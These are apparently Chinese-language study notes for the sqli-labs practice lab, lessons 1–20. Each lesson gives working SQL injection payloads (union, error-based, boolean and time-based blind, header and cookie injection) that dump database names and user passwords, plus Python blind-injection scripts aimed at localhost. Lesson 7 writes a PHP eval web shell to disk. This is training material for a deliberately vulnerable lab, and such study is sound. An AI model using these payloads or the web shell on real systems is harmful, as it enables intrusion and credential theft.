sqli-labs学习笔记(基础篇)
- sqli-labs学习笔记(基础篇)
- less-1 单引号
- less-2 无引号
- less-3 括号加引号
- less-4 括号
- less-5 单引号布尔盲注
- less-6 双引号布尔盲注
- less-7 写shell
- less-8 无报错的布尔盲注
- less-9 单引号时间盲注
- less-10 双引号时间盲注
- less-11 单引号POST注入
- less-12 双引号POST注入
- less-13 单引号报错注入
- less-14 双引号报错注入
- less-15 POST时间盲注
- less-16 POST时间盲注
- less-17 update注入
- less-18 insert注入
- less-19 insert注入
- less-20 cookie注入
- 总结
less-1 单引号
GET-Error based-Single quotes-String
后台语句:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
判断:1'
use near ''1'' LIMIT 0,1' at line 1
正常:1' and 1=1%23
错误:1' and 1=2%23
确定列数:1' order by 3%23
爆数据库名:-1' union select 1,database(),3%23
爆表名:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
爆列名:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
爆数据:-1' union select 1,group_concat(password),3 from security.users%23
less-2 无引号
GET-Error based-Intiger based
后台语句:
SELECT * FROM users WHERE id=$id LIMIT 0,1
判断:1'
use near '' LIMIT 0,1' at line 1
正常:1 and 1=1%23
错误:1 and 1=2%23
确定列数:1 order by 3%23
爆数据库名:-1 union select 1,database(),3%23
爆表名:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
爆列名:-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
爆数据:-1 union select 1,group_concat(password),3 from security.users%23
less-3 括号加引号
GET-Error based-Single quotes with twist-string
后台语句:
SELECT * FROM users WHERE id=('$id') LIMIT 0,1
判断:1'
use near ''1'') LIMIT 0,1' at line 1
正常:1') and 1=1%23
错误:1') and 1=2%23
确定列数:1') order by 3%23
爆数据库名:-1') union select 1,database(),3%23
爆表名:-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
爆列名:-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
爆数据:-1') union select 1,group_concat(password),3 from security.users%23
less-4 括号
GET-Error based-Double Quotes-String
后台语句:
SELECT * FROM users WHERE id=($id) LIMIT 0,1
判断:1"
use near '"1"") LIMIT 0,1' at line 1
正常:1") and 1=1%23
错误:1") and 1=2%23
确定列数:1") order by 3%23
爆数据库名:-1") union select 1,database(),3%23
爆表名:-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
爆列名:-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
爆数据:-1") union select 1,group_concat(password),3 from security.users%23
less-5 单引号布尔盲注
GET-Double Injection-Single Quotes-String
后台语句:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
判断:1'
use near ''1'' LIMIT 0,1' at line 1
正常:1' and 1=1%23 -> You are in...........
错误:1' and 1=2%23 -> 无回显
编写exp:
import requests
url = "http://127.0.0.1/sqli-labs-master/Less-5/?id="
result = ""
for i in range(1,50):
for j in range(95,128):
a = chr(j)
payload ="1' and (select substr(database(),{},1) = '{}')-- +".format(i,a)
html = requests.get(url+payload)
print(i,j,":")
print(url+payload)
if "You" in html.text:
result = result + chr(j)
break
print(result)
print("flag: " ,result)
# 1' and (select substr(database(),{},1) = '{}')-- + 数据库名
# 1' and (select substr(group_concat(table_name),{},1) from information_schema.tables where table_schema='security') ='{}'-- + 表名
# 1' and (select substr(group_concat(column_name),{},1) from information_schema.columns where table_name='users') ='{}'-- + 列名
# 1' and substr((select password from security.users limit 0,1),{},1)='{}'-- + 值
less-6 双引号布尔盲注
GET-Double Injection-Double Quotes-String
后台语句:
SELECT * FROM users WHERE id="$id" LIMIT 0,1
报错:1"
use near '"1"" LIMIT 0,1' at line 1
正常:1" and 1=1%23 -> You are in...........
错误:1" and 1=2%23 -> 无回显
更改exp:
# 1" and (select substr(database(),{},1) = '{}')-- + 数据库名
# 1" and (select substr(group_concat(table_name),{},1) from information_schema.tables where table_schema='security') ='{}'-- + 表名
# 1" and (select substr(group_concat(column_name),{},1) from information_schema.columns where table_name='users') ='{}'-- + 列名
# 1" and substr((select password from security.users limit 0,1),{},1)='{}'-- + 值
less-7 写shell
GET-Dump into outfile-String
修改权限:路径:phpstudyPHPTutorialMySQLmy.ini
secure_file_priv =(没有直接添加即可)
后台语句:
SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1
写shell:
1')) union select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test.php" --+
会报错但是查看文件夹写入成功
less-8 无报错的布尔盲注
GET-Blind-Boolian Based-Single Quotes
后台语句:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
判断:1"
正常:1' and 1=1%23 -> You are in...........
错误:1' and 1=2%23 -> 无回显
直接使用less-5的exp即可
less-9 单引号时间盲注
GET-Blind-time based-Single Quotes
后台语句:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
判断:1' and if(1=0,1, sleep(5)) --+
编写exp:
# coding:utf-8
import requests
import datetime
import time
name = ''
for j in range(1, 9):
for i in '0123456789abcdefghijklmnopqrstuvwxyz':
url = '''http://127.0.0.1/sqli-labs-master/Less-9/?id='''
payload = '''1' and if(substr(database(),%d,1)='%s',sleep(3),1)''' % (j, i)
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec > 2:
name += i
print(name)
break
print('database_name:', name)
less-10 双引号时间盲注
GET-Blind-Time based-double quotes
后台语句:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
判断:1" and if(1=0,1, sleep(5)) --+
编写exp:
# coding:utf-8
import requests
import datetime
import time
name = ''
for j in range(1, 9):
for i in '0123456789abcdefghijklmnopqrstuvwxyz':
url = '''http://127.0.0.1/sqli-labs-master/Less-9/?id='''
payload = '''1" and if(substr(database(),%d,1)='%s',sleep(3),1)''' % (j, i)
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec > 2:
name += i
print(name)
break
print('database_name:', name)
less-11 单引号POST注入
POST-Error Based-Single quotes-String
后台语句:
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
判断:admin' & 123
use near '123' LIMIT 0,1' at line 1
确定列数:admin' order by 2#
爆数据库名:-admin' union select 1,database()#
爆表名:-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
爆列名:-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
爆数据:-admin' union select 1,group_concat(password) from security.users#
( 因为#号过滤了后面的内容,所以密码均任意即可)
less-12 双引号POST注入
POST-Error Based-Double quotes-String-with twist
后台语句:
SELECT username, password FROM users WHERE username=("$uname") and password=("$passwd") LIMIT 0,1
(实际无法这么写,本文此种写法是为了简洁,意思相同)
判断:admin" & 123
use near '123") LIMIT 0,1' at line 1
确定列数:admin") order by 2#
爆数据库名:-admin") union select 1,database()#
爆表名:-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
爆列名:-admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
爆数据:-admin") union select 1,group_concat(password) from security.users#
( 因为#号过滤了后面的内容,所以密码均任意即可)
less-13 单引号报错注入
POST-Double Injection-Single quotes-String-with twist
基本情况:只有报错,无其他任何回显
后台语句:
SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1
(实际无法这么写,本文此种写法是为了简洁,意思相同)
判断:admin' & 123
use near '123') LIMIT 0,1' at line 1
确定列数:admin') order by 2#
爆数据库名:1')||updatexml(1,concat(0x7e,(select database()),0x7e),1)#
爆表名:1')||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
爆列名:1')||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#
爆数据:1')||(updatexml(1,concat(0x7e,(select(group_concat(password))from(users))),1))#
1')||(updatexml(1,concat(0x7e,(mid((select(group_concat(password))from(users)),32))),1))#
( 因为#号过滤了后面的内容,所以密码均任意即可)
less-14 双引号报错注入
POST-Double Injection-Single quotes-String-with twist
基本情况:只有报错,无其他任何回显
后台语句:
SELECT username, password FROM users WHERE username="$uname" and password="$passwd" LIMIT 0,1
(实际无法这么写,本文此种写法是为了简洁,意思相同)
判断:admin" & 123
use near '123" LIMIT 0,1' at line 1
确定列数:admin') order by 2#
爆数据库名:1"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
爆表名:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#
爆列名:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#
爆数据:1"||(updatexml(1,concat(0x7e,(select(group_concat(password))from(users))),1))#
1"||(updatexml(1,concat(0x7e,(mid((select(group_concat(password))from(users)),32))),1))#
( 因为#号过滤了后面的内容,所以密码均任意即可)
less-15 POST时间盲注
POST-Blind-BOOlian/time Based-Single quotes
无任何回显
后台语句:
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
编写exp:
#coding=utf-8
import requests
import time
name=""
url="http://127.0.0.1/sqli-labs-master/Less-15/"
headers={
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
'Host': 'localhost'
}
currentTime=time.time()
for i in range(1,20):
for j in range(32,128):
payload=" and if(left(database(),%d)='%s',sleep(4),null)#"%(i,name+chr(j))
data={
"uname":"admin'"+payload,
"passwd":"123",
"submit":"Submit"
}
starttime=time.time()
name1=requests.post(url,data=data,headers=headers)
if time.time()-starttime>=3:
name+=chr(j)
print(j)
break
finishTime=time.time()
print("[+]一共使用了"+str(finishTime-currentTime)+"s")
print("[+]数据库名字:"+name)
less-16 POST时间盲注
POST-Blind-BOOlian/time Based-Double quotes
无其他任何回显
后台语句:
SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1
单引号换成双引号即可
less-17 update注入
POST-Update Query-Error Based-String
基本情况:对用户名进行过滤,且查询时写死,无法绕过
后台语句:
UPDATE users SET password = '$passwd' WHERE username='$row1'
判断:admin & 1
use near 'admin'' at line 1
爆数据库名:1'||updatexml(1,concat(0x7e,(select database()),0x7e),1)#
爆表名:1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
爆列名:1'||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#
爆数据:1'||updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)#
1'||updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)#
(不能依据某字段值做判断再来更新某字段的值,将SELECT出的结果再通过中间表SELECT一遍)
less-18 insert注入
POST-Header Injection-Uagent field-Error based
后台语句:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
爆数据库名:1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1
爆表名:1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1
爆列名:1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1
爆数据:1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1
1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1
less-19 insert注入
POST-Header Injection-Referer field-Error based
后台语句:
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')
爆数据库名:1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1
爆表名:1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1
爆列名:1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1
爆数据:1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1
1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1
less-20 cookie注入
POST-Cookie Injections-Uagent field-error based
后台语句:
SELECT * FROM users WHERE username='$cookee' LIMIT 0,1
爆数据库名:1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1
爆表名:1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1
爆列名:1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1
爆数据:1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1
1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1
总结
适用范围:
| 注入类型 | 适用范围 | 可能包含的源码 |
|---|---|---|
| 联合注入 | 输出查询结果 | echo 'Your Login name:'. $row['username']; |
| 报错注入 | 输出报错结果 | print_r(mysql_error()); |
| 布尔盲注 | 执行正确和错误回显不同 | if($row){echo a}else{echo b} |
| 时间盲注 | 执行正确和错误时间不同 | if($row){echo a}else{echo a} |
| 写shell | 无回显 | 正常语句 |